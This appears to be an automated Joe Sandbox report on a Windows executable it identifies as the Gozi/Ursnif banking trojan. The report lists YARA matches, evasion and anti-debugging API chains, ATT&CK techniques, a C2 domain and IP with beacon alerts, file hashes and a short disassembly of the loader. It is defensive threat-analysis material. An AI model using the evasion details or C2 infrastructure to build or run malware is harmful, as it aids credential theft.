          Source: 00000000.00000003.441227319.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
          Source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
          Source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
          Source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
          Source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
          Source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
          Source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
          Source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
          Source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
          Source: Process Memory Space: d2ef5.exe PID: 4684, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
          Source: Process Memory Space: d2ef5.exe PID: 4684, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\d2ef5.exeCode function: 0_2_00401493 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
          Source: C:\Users\user\Desktop\d2ef5.exeCode function: 0_2_00401D95 GetProcAddress,NtCreateSection,memset,
          Source: C:\Users\user\Desktop\d2ef5.exeCode function: 0_2_00401F78 NtMapViewOfSection,
          Source: d2ef5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: d2ef5.exeReversingLabs: Detection: 88%
          Source: d2ef5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\d2ef5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\d2ef5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
          Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@3/1
          Source: C:\Users\user\Desktop\d2ef5.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\d2ef5.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\d2ef5.exeCode function: 0_2_0040134F LoadLibraryA,GetProcAddress,

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: Yara matchFile source: 00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441128955.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.440946252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441227319.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: d2ef5.exe PID: 4684, type: MEMORYSTR
          Source: Yara matchFile source: 0.2.d2ef5.exe.420000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.d2ef5.exe.10194a0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.569687253.0000000001019000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\d2ef5.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\d2ef5.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\d2ef5.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
          Source: C:\Users\user\Desktop\d2ef5.exeAPI call chain: ExitProcess graph end node

          Anti Debugging

          barindex
          Source: C:\Users\user\Desktop\d2ef5.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
          Source: C:\Users\user\Desktop\d2ef5.exeCode function: 0_2_0040134F LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\d2ef5.exeCode function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
          Source: C:\Users\user\Desktop\d2ef5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\Desktop\d2ef5.exeCode function: 0_2_004012B0 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
          Source: C:\Users\user\Desktop\d2ef5.exeCode function: 0_2_00401A49 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441128955.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.440946252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441227319.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: d2ef5.exe PID: 4684, type: MEMORYSTR
          Source: Yara matchFile source: 0.2.d2ef5.exe.420000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.d2ef5.exe.10194a0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.569687253.0000000001019000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441128955.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.440946252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441227319.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: d2ef5.exe PID: 4684, type: MEMORYSTR
          Source: Yara matchFile source: 0.2.d2ef5.exe.420000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.d2ef5.exe.10194a0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.569687253.0000000001019000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts2
          Windows Management Instrumentation
          Path InterceptionPath Interception1
          Virtualization/Sandbox Evasion
          OS Credential Dumping1
          System Time Discovery
          Remote ServicesData from Local SystemExfiltration Over Other Network Medium3
          Non-Application Layer Protocol
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts11
          Native API
          Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts2
          Software Packing
          LSASS Memory1
          Security Software Discovery
          Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth13
          Application Layer Protocol
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager1
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
          Ingress Tool Transfer
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS114
          System Information Discovery
          Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
          Remote System Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          d2ef5.exe88%ReversingLabsWin32.Infostealer.Gozi
          d2ef5.exe100%AviraTR/Crypt.XPACK.Gen7
          d2ef5.exe100%Joe Sandbox ML
          No Antivirus matches
          SourceDetectionScannerLabelLinkDownload
          0.2.d2ef5.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
          0.2.d2ef5.exe.420000.1.unpack100%AviraHEUR/AGEN.1245293Download File
          0.0.d2ef5.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
          No Antivirus matches
          No Antivirus matches
          NameIPActiveMaliciousAntivirus DetectionReputation
          siwdmfkshsgw.com
          194.58.112.174
          truetrue
            unknown
            trackingg-protectioon.cdn1.mozilla.net
            unknown
            unknownfalse
              high
              NameSourceMaliciousAntivirus DetectionReputation
              https://www.reg.ru/web-sites/?utm_source=siwdmfkshsgw.com&utm_medium=parking&utm_campaign=s_land_cmsd2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://www.reg.ru/web-sites/website-builder/?utm_source=siwdmfkshsgw.com&utm_medium=parking&utm_camd2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://www.reg.ru/domain/new/?utm_source=siwdmfkshsgw.com&utm_medium=parking&utm_campaign=s_land_ned2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://reg.rud2ef5.exe, 00000000.00000003.484862658.00000000015FB000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://www.reg.ru/support/ssl-sertifikaty/zakaz-ssl-sertifikata/Kak-zakazat-besplatny-SSL-sertifikad2ef5.exe, 00000000.00000003.484845306.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, d2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://www.reg.ru/dedicated/?utm_source=siwdmfkshsgw.com&utm_medium=parking&utm_campaign=s_land_serd2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://www.reg.ru/whois/?check=&dname=siwdmfkshsgw.com&reg_source=parking_autod2ef5.exe, 00000000.00000003.484862658.00000000015FB000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://parking.reg.ru/script/get_domain_data?domain_name=siwdmfkshsgw.com&rand=d2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://www.reg.ru/hosting/?utm_source=siwdmfkshsgw.com&utm_medium=parking&utm_campaign=s_land_host&d2ef5.exe, 00000000.00000003.484854452.00000000015FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                194.58.112.174
                                siwdmfkshsgw.comRussian Federation
                                197695AS-REGRUtrue
                                Joe Sandbox Version:36.0.0 Rainbow Opal
                                Analysis ID:730728
                                Start date and time:2022-10-26 08:28:49 +02:00
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 5m 30s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:d2ef5.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:7
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@3/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HDC Information:
                                • Successful, ratio: 100% (good quality ratio 100%)
                                • Quality average: 90.4%
                                • Quality standard deviation: 14.5%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: d2ef5.exe
                                No simulations
                                No context
                                No context
                                No context
                                No context
                                No context
                                No created / dropped files found
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.520215470573881
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:d2ef5.exe
                                File size:37888
                                MD5:1d8a445bef0c0d4a7ec519f06c23224a
                                SHA1:7dd349b8664ec7dbe769da64e1b324ae091a29e2
                                SHA256:e807c46ba7cd53bf6900d1a8f32baba9a118410483faa68d51b233de738483e3
                                SHA512:67e0a57bfeb122e346d909680b4f99ed1138f42e9c8a74bba7d143de1f6413c94f45000c0c5fd1bc511db0c11bdf668dcc0b5721d0e5df3288d464ed439ac2cc
                                SSDEEP:768:tQLm41fM01vAeyRTwFiCRn7IYbo7gMaBMOF6c629pto:tL41fMSv7ASRnFLMaMOF6c6Y
                                TLSH:6E03E1276AA42D7DFAC345353A21F24207990271833ED5D607B3B47E8523ADF511F792
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y..+...x...x...x..lx...x...xQ..x...x...x..vx...x..kx...x..nx...xRich...x........PE..L.....%c............................/......
                                Icon Hash:00828e8e8686b000
                                Entrypoint:0x40182f
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0x632596C9 [Sat Sep 17 09:43:37 2022 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:0
                                File Version Major:5
                                File Version Minor:0
                                Subsystem Version Major:5
                                Subsystem Version Minor:0
                                Import Hash:1640d668d1471f340cbe565fe63522f6
                                Instruction
                                push esi
                                xor esi, esi
                                push esi
                                push 00400000h
                                push esi
                                call dword ptr [0040203Ch]
                                mov dword ptr [00403160h], eax
                                cmp eax, esi
                                je 00007FCC7CADD247h
                                push esi
                                call dword ptr [00402008h]
                                mov dword ptr [00403170h], eax
                                call dword ptr [00402044h]
                                call 00007FCC7CADCE59h
                                push dword ptr [00403160h]
                                mov esi, eax
                                call dword ptr [00402040h]
                                push esi
                                call dword ptr [00402048h]
                                pop esi
                                push ebp
                                mov ebp, esp
                                sub esp, 0Ch
                                push ebx
                                push esi
                                mov esi, eax
                                mov eax, dword ptr [00403180h]
                                mov ecx, dword ptr [esi+3Ch]
                                mov ecx, dword ptr [ecx+esi+50h]
                                lea edx, dword ptr [eax-69B24F45h]
                                not edx
                                lea ecx, dword ptr [ecx+eax-69B24F45h]
                                push edi
                                and ecx, edx
                                lea edx, dword ptr [ebp-08h]
                                push edx
                                lea edx, dword ptr [ebp-04h]
                                push edx
                                add eax, 964DA0FCh
                                push eax
                                push ecx
                                call 00007FCC7CADD4ADh
                                test eax, eax
                                jne 00007FCC7CADD27Ch
                                mov edi, dword ptr [ebp-04h]
                                push esi
                                push edi
                                call 00007FCC7CADD583h
                                mov ebx, eax
                                test ebx, ebx
                                jne 00007FCC7CADD258h
                                mov esi, dword ptr [edi+3Ch]
                                add esi, edi
                                push esi
                                call 00007FCC7CADCCA4h
                                mov ebx, eax
                                test ebx, ebx
                                jne 00007FCC7CADD247h
                                push edi
                                mov eax, esi
                                call 00007FCC7CADD784h
                                mov ebx, eax
                                test ebx, ebx
                                jne 00007FCC7CADD239h
                                mov esi, dword ptr [esi+28h]
                                push eax
                                push 00000001h
                                add esi, edi
                                push edi
                                call esi
                                test eax, eax
                                jne 00007FCC7CADD22Ah
                                call dword ptr [0000202Ch]
                                Programming Language:
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2008 SP1 build 30729
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x20e80x50.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x50000x10.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xd8.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000xa8.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x10000x1000False0.718017578125data6.515539058364033IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0x20000x4c00x600False0.4635416666666667data4.488955985688776IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0x30000x1940x200False0.056640625data0.12227588125913882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .bss0x40000x2dc0x400False0.7607421875data6.3016514258390215IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x50000x100x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x60000x80000x7200False0.9715254934210527data7.860072145833389IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                DLLImport
                                ntdll.dll_snwprintf, memset, NtQuerySystemInformation, _aulldiv
                                KERNEL32.dllGetModuleHandleA, GetLocaleInfoA, GetSystemDefaultUILanguage, HeapAlloc, HeapFree, WaitForSingleObject, Sleep, ExitThread, lstrlenW, GetLastError, VerLanguageNameA, GetExitCodeThread, CloseHandle, HeapCreate, HeapDestroy, GetCommandLineW, ExitProcess, SetLastError, TerminateThread, SleepEx, GetModuleFileNameW, CreateThread, OpenProcess, CreateEventA, GetLongPathNameW, GetVersion, GetCurrentProcessId, GetProcAddress, LoadLibraryA, VirtualProtect, MapViewOfFile, GetSystemTimeAsFileTime, CreateFileMappingW, QueueUserAPC
                                ADVAPI32.dllConvertStringSecurityDescriptorToSecurityDescriptorA
                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                192.168.2.4194.58.112.17449695802033203 10/26/22-08:31:08.563638TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4969580192.168.2.4194.58.112.174
                                192.168.2.4194.58.112.17449695802033204 10/26/22-08:31:08.563638TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4969580192.168.2.4194.58.112.174
                                TimestampSource PortDest PortSource IPDest IP
                                Oct 26, 2022 08:31:08.501054049 CEST4969580192.168.2.4194.58.112.174
                                Oct 26, 2022 08:31:08.562967062 CEST8049695194.58.112.174192.168.2.4
                                Oct 26, 2022 08:31:08.563141108 CEST4969580192.168.2.4194.58.112.174
                                Oct 26, 2022 08:31:08.563637972 CEST4969580192.168.2.4194.58.112.174
                                Oct 26, 2022 08:31:08.625370979 CEST8049695194.58.112.174192.168.2.4
                                Oct 26, 2022 08:31:08.625478983 CEST8049695194.58.112.174192.168.2.4
                                Oct 26, 2022 08:31:08.625561953 CEST8049695194.58.112.174192.168.2.4
                                Oct 26, 2022 08:31:08.625597954 CEST8049695194.58.112.174192.168.2.4
                                Oct 26, 2022 08:31:08.625643969 CEST8049695194.58.112.174192.168.2.4
                                Oct 26, 2022 08:31:08.625663042 CEST8049695194.58.112.174192.168.2.4
                                Oct 26, 2022 08:31:08.625679970 CEST8049695194.58.112.174192.168.2.4
                                Oct 26, 2022 08:31:08.625698090 CEST8049695194.58.112.174192.168.2.4
                                Oct 26, 2022 08:31:08.625715971 CEST8049695194.58.112.174192.168.2.4
                                Oct 26, 2022 08:31:08.625730038 CEST8049695194.58.112.174192.168.2.4
                                Oct 26, 2022 08:31:08.625751019 CEST4969580192.168.2.4194.58.112.174
                                Oct 26, 2022 08:31:08.625751019 CEST4969580192.168.2.4194.58.112.174
